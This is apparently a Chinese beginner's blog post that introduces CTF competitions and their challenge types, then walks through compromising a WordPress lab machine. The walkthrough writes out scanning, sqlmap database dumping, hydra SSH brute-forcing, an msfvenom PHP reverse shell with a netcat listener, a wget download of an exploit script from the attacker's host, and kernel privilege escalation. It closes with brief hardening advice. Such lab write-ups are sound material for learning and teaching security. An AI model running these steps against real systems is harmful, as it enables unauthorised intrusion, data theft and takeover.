什么是CTF

本文是对入门学习的一些概念了解和一些常规场景记录

1.CTF(capture the flag)是夺旗赛的意思。

是网络安全技术人员之间进行攻防的比赛。
起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。
(DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行) 有黑客比赛的世界杯的说法。 CTF竞赛已成为安全圈最流行竞赛模式。

国际知名赛事

DEFCON CTF:CTF赛事中的“世界杯”
UCSB iCTF:来自UCSB的面向世界高校的CTF
Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛 
Boston Key Party:近年来崛起的在线解题赛 Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元 Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元 XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF

国内知名赛事

XCTF联赛:是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
(国内,亚洲最大竞赛。清华蓝莲花战队发起) 强网杯:国家级安全比赛,网信办网络安全协调局指导。 红帽杯:广东公安厅,计算机网络安全协会举办 AliCTF:阿里 TCTF:腾讯 BCTF:百度 WCTF:世界大赛邀请制,
360 HCTF:杭州电子科技大学信息安全协会 ISCC:全国大学生,北理工

2.竞赛模式:

1.解题模式(jeopardy风险,危险)

通常是线上参与,网络安全技术的题目。
题目包含:逆向,漏洞挖掘和利用,web渗透,密码,取证,隐写,安全编程等类型。

 2.攻防模式(attack&defense)

互相攻击防守,挖掘漏洞攻击和修复漏洞防守。

3.混杂模式(mix)

解题和攻防模式结合,典型赛事iCTF。

3.题目类型

3.1.reverse(逆向)

涉及逆向分析能力:软件逆向,破解技术,反汇编和反编译技术。
知识:汇编语言,加解密,反编译工具等。

3.2.Pwn(破解)

pwn发音砰,破解的意思,主要溢出漏洞(堆和栈溢出等)。
涉及对二进制漏洞挖掘和利用能力。
知识:c/c++,OD+IDA,数据结构,操作系统,汇编原理。
(CE(CheatEngine)用来定位数据,OD(ollydbg)用来动态调试,IDA(Interactive Disassembler)用来看代码)

3.3.web(web安全)

web站点漏洞挖掘和利用:XSS,文件包含,代码执行,上传漏洞,sql注入等。
以及数据包的构造和响应,tcp/ip协议。
知识:PHP,JSP, JAVA, Python,TCP/IP,SQL,OWASP TOP 10

3.4.crypto(加解密)

涉及密码学相关技术,加解密技术,编码解码技术。
知识:数论,矩阵,密码学。

3.5.misc(杂项)

安全相关:信息收集,隐写,流量分析,数字取证,编码转换。
知识:隐写术,wireshark流量分析审查等工具使用,编码。

3.6.mobile(移动)

涉及APP漏洞挖掘和利用:iPhone和Android系统,以Android的apk破解为主。
知识:Android 

4.学习建议:

可以刷题或者靶机练习,以web安全作为学习入口是不错选择。

XCTF(攻防世界)
Bugku CTF  
Jarvis OJ  
ctf.show 
BUUCTF  
CTFHub  

 词汇简介:POC,EXP,CVE,CVSS

POC(Proof of Concept)
漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在

EXP(Exploit)
漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本)

0DAY
含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。

CVE(Common Vulnerabilities & Exposures)
公共漏洞和暴露,信息安全漏洞公共的名称。
使用一个共同的名字,可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题 。

5.靶机实战:拿下wordpress提权

测试环境:

kali攻击机和WordPress系统的靶机。
WordPress是一款个人博客框架属于内容管理系统(CMS)使用PHP语言和mysql数据库架设。

攻击过程:

信息收集,漏洞挖掘,漏洞利用,权限提升。

5.1.信息收集

包括:主机,ip,端口,服务,操作系统,目录等扫描收集及社工。
1.主机发现工具:arp-scan netdiscover fping等。
arp-scan -l //局域网扫描
netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描
通过mac地址得到厂商。

2.端口扫描工具:nmap
-A:全面探测(aggressive(进攻性)) -sS:SYN扫描(半连接) -sV:显示版本 -v:显示vebose详细过程 
-p-:全端口(1-65535) -T4:延迟级别,放弃超时10ms
nmap -sS -sV -v -p- -T4  192.168.12.1
nmap -A ip
nmap -A -sS -sV -v -p- -T4  192.168.12.1

常见端口和服务:
22:ssh 25:smtp 80:http 111:RPCINFO服务 443:HTTPS服务
624:PRC 3306:MYSQL


3.信息收集目标就是威胁建模
(简单来说就是猜测服务可能存在攻击方式和漏洞)
对于web服务主要收集:服务和系统的名称和版本。
可以利用谷歌浏览器Wappalyzer插件收集:系统和服务的版本信息
WordPress版本,操作系统,数据库类型,PHP版本

web地址的参数或者表单验证是否可sql注入,
一般首页是没有参数的,选择注册页或者可传参数的页面
比如xx
?id=1 后面加个冒号:xxx?id=1' 后面加 and 1=1 后者and 1=2:id=1 and 1=1 或者id=1 and 1=2
and sleep(5)
根据响应页面的内容对比判断是否存在注入点。 一般使用工具sqlmap更方便 ssh尝试弱口令爆破 工具:九头蛇 美杜莎 4.目录扫描:dirb,dirbuster,gobuster,御剑等工具。nikto。 对于web目录扫描是关键步骤,甚至首步骤。 作用:敏感目录和敏感文件可能泄露(管理页面,遗留文件)。

 发现管理后台,数据库管理页面。

5.2.漏洞挖掘

几种方式:
1.对于管理后台尝试:
弱口令(默认密码,常用密码),
暴力破解(工具:burp爆破,PHPmyadmin爆破)。
比如phpmyadmin(数据库网页管理工具的主页)

2.链接的参数注入
工具:sqlmap参数:-u:url --dbs:爆破数据库 -D:指定数据库 --tables:爆破数据表 -T:指定表 --columns:爆破字段 -C:指定字段(可多个) --dump :脱库
sql注入检测:sqlmap -u "http://xxx?id=1" 
得到数据库,web服务器,操作系统类型和版本以及具体库
sql注入检测:sqlmap -u "http://xxx?id=1"  --dbs
得到哪些库
sqlmap -u "xxx?id=1" --dbs -D xx --tables
得到爆破xx库的表
sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns
得到爆破的字段
sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump
得到爆破字段的内容

有时需要cookie(登陆后)才能sqlmap扫描参数:
获取cookie:浏览器开发者网络查看或者控制台(输入document.cookie获取)
sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs

通过爆破可能得到账号和密码,如果服务支持ssh,可以尝试连接
>ssh xx用户@ipxxxx
>密码xxx
(制作密码字典工具以及破解:crunch ;hydra 。
比如:crunch 8 8 -t admin%%@@ -o dic.txt //8 8:最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件 暴力破解ssh:
hydra -l guest -P dic.txt xx.xx.ip ssh
3.网页前端源码查看 是否只是前端验证。 4.nikto可对web服务器全面漏洞扫描:服务器cgi和项目及配置等 cgi通用网关接口:网页原本是静态的,通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页,类似servelet。 有时候指服务器,有时候 指cgi语言。 nikto -h http://xxx 得到一些敏感目录和文件,比如源码b备份,sql等 分析源码获得漏洞,获取管理员账号等

拿到网站管理员权限:密码破解获得数据库管理权限以及后台管理员

5.3.漏洞利用

1.利用MSF生成反弹shell(木马)
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php
生成php网页木马,让目标连接自己主机
kali自带php马:/usr/share/webshells/php/php-reverse-sell.php

2.上传马
将马页面放到php执行目录,或者写入可执行某个页面。

3.监听原先木马设置端口以建立链接
几种方式:
1)netcat工具:类似工具:中国菜刀
nc -nlvp 4444
2)msf
msf>use exploit/multi/handler
>set playload php/meterpreter_reverse_tcp
>set lhost ip
>exploit
执行后会形成一个会话session,ctr+c可退出,
输入:session 1进入会话:
meterpreter>

linux查看监听:netstat -tunlp

4.得到shell
访问马页面,监听程序得到反弹shell.
此时这个shell是web服务器的权限也就是Apache服务器权限。
whoami ;查看当前权限
uname -a : 查看linux系统内核版本

如果使用msf监听那么执行exploit,连接建立后会得到shell
meterpreter>
输入:sysinfo 查看系统版本信息,
输入:shell 生成交互shell
还可以切换不同样式的shell:交互更友好:
python -c 'import pty;pty.spawn("/bin/bash")'
(common shell和 meterpreter shell区分
有些连接得到是common shell 使用ctr+z 
然后:y 让当前shell隐藏回到msf界面,
使用session -l :查看所有会话shell,每个会话有个id。
session -u 某id:将某会话从common变成meterpreter
session -i 某id :进入某id会话
)


5.权限提升,获取root权限
1).漏洞脏牛(dirty cow,CVE-2016-5195)对Linux内核>=2.6.22版本(2007年发布)本地提权,直到2016.10才修复。
原理:内核的内存子系统在处理写入复制时(copy-on-write)产生了竞争条件,利用执行顺序异常,对只读内存映射进行写入,获得root权限。
github官方提供exp
2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞)
searchsploit linux udev (漏洞库搜索udev漏洞的exp)
/usr/share/exploitdb/platforms/linux/local/8478.sh

exp在靶机执行需要先获取执行文件,还的添加执行权限。
提供一个传送地址的几种方式:
1).sh放在/tmp下,并执行:python -m SimpleHTTPServer 80
目标主机获取:wget http://xx/xx.sh
查看进程:cat /proc/net/netlink 
在特定进程执行udev

思路:知道漏洞,找到漏洞exp。

补充:低权限rbash提升(绕过)

当用guest用户登陆系统:ssh gust@xx.xx.xx.ip
得到的shell可能权限非常低很多命令不能使用
当前是rbash解析命令:
echo $PATH:查看当前path。
输出:/home/guest/prog
输入命令会先到path目录下查找,存在才会直接执行,否则需要输入全路径才行执行。

echo $PATH/*:查看可以直接执行的命令
输出:/home/guest/prog/vi
即表面可以直接执行vi。
进入vi:
:!/bin/bash //!在命令前面表示调用外部命令,在命令后面(wq!)表示强制执行。
执行后命令使用bash来解析。
(sudo以管理员运行,su切换用户,sudo su 切换到管理员)
执行sudo su 显示找不到命令sudo
某目录查找命令:
ls -la /bin/sudo
ls -la /sbin/sudo
ls -la /usr/bin/sudo //确定sudo位置
修改环境变量:
export PATH=$PATH:/usr/bin/sudo
查看当前path:
echo $paht
查找将su命令路径添加到环境:
ls -la /bin/su //确认位置
修改path:
export PATH=$PATH:/bin/su
接下可以执行:sudo su(需要有密码)

5.4.如何防御:

1.关闭多余端口,最小原则。
2.使用cms等系统,修改默认后台路径。
3.数据管理PHPmyadmin修改默认路径和密码。
4.升级操作系统版本,及时打补丁修复漏洞。
5.关注最新漏洞情报,提升安全运维响应能力。

 

posted @ 2022-09-17 00:18  假程序猿  阅读(1435)  评论(0编辑  收藏  举报